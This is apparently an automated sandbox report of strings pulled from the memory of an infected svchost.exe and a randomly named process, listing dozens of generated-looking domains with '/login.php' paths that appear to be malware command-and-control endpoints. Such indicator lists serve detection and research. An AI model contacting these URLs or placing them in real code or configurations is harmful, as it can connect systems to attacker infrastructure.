Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298951843.00000000086D4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2556984027.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://galycuw.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2550145927.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2308037835.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296517767.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549686862.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548641598.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549395486.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302432052.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2305095010.0000000008701000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298813609.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548645821.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2295479426.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296451736.0000000008702000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://galydoz.com/login.php
Source: svchost.exe, 00000002.00000003.2681961070.000000000866F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://galydyw.com/
Source: svchost.exe, 00000002.00000003.2763334143.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670306640.00000000087FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403450959.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3265760525.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771121340.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350325354.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671936852.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2787365873.00000000086F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://galydyw.com/login.php
Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2391261344.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2805126129.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2799115351.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2802098474.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384383810.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3266427470.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2804014951.00000000008A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://galyfez.com/login.php
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337099007.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610522908.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2640219450.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337011719.0000000003394000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332778027.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738516422.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333419776.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635676013.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610879120.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635826907.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671484952.00000000086F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://galyheh.com/login.php
Source: svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557475743.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3344516796.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403579535.000000000870D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577719348.0000000008784000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202728385.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3388123270.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404003407.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548810720.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3402591277.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202332641.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578793071.0000000008786000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393482937.000000000339B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3344396822.0000000003399000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://galyhiw.com/login.php
Source: svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2155150601.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2394995795.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3282956262.000000000339A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2152199201.000000000338F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3296927837.0000000003399000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000006.00000002.2733416103.00000000096C4000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000006.00000002.2733416103.00000000095F8000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000006.00000002.2670340730.0000000009356000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2606731229.0000000000721000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2754881152.0000000008405000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2767328417.0000000008790000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2754881152.000000000843D000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 0000001F.00000002.2711620441.0000000008C6C000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 0000001F.00000002.2695589851.0000000000CAA000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 0000001F.00000002.2746386835.0000000008E05000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://galykes.com/login.php
Source: svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2763334143.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353785619.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359008557.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353793003.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2354372156.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403450959.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3265760525.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771121340.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353676961.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358098293.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://galypob.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2308037835.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558367053.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302432052.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578065233.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2556984027.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2305095010.0000000008701000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301364243.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://galypyh.com/login.php
Source: svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332552292.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2628718282.00000000087AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326892101.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635696281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347564818.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2581725706.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638579923.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://galyquw.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://galyros.com/login.php
Source: svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://galyvuz.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332778027.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333419776.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://galyzeb.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321434222.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321666596.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ganycuh.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321288467.0000000008716000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578065233.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321666596.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ganydiw.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298951843.00000000086D4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2556984027.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ganyfes.com/login.php
Source: svchost.exe, 00000002.00000003.2672088553.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671936852.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ganyhab.com/login.php
Source: svchost.exe, 00000002.00000003.2440992752.000000000866F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2396181713.000000000866F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2393087013.000000000866C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ganyhus.com/H
Source: svchost.exe, 00000002.00000003.2385477507.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3283281392.0000000008784000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2396823285.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2396706488.00000000086F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2805126129.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2397272204.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2395827509.00000000086EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2408435581.0000000008706000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ganyhus.com/login.php
Source: svchost.exe, 00000002.00000003.2763334143.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3246499612.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403450959.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3268596550.0000000008643000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3265760525.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771121340.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3402132488.0000000008646000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671936852.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ganynos.com/login.php
Source: svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2156423614.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2153845839.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2503287920.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2396706488.00000000086F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2155150601.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502622128.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2157020892.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2397272204.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2151605214.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2395827509.00000000086EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2394995795.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2167507417.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549395486.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2152199201.000000000338F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513112023.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2152200523.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2157370436.00000000008A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ganypih.com/login.php
Source: svchost.exe, 00000002.00000003.2538146592.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2264150395.00000000086FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2524832364.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513112023.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2281429661.000000000861B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ganyqow.com/login.php
Source: svchost.exe, 00000002.00000003.2194039895.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2433469264.000000000868F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2430808473.000000000868F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548643584.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202728385.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393602354.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2527269285.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2541435217.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393482937.000000000339B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3344396822.0000000003399000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202485680.00000000008A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ganyrys.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558367053.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ganyvoz.com/login.php
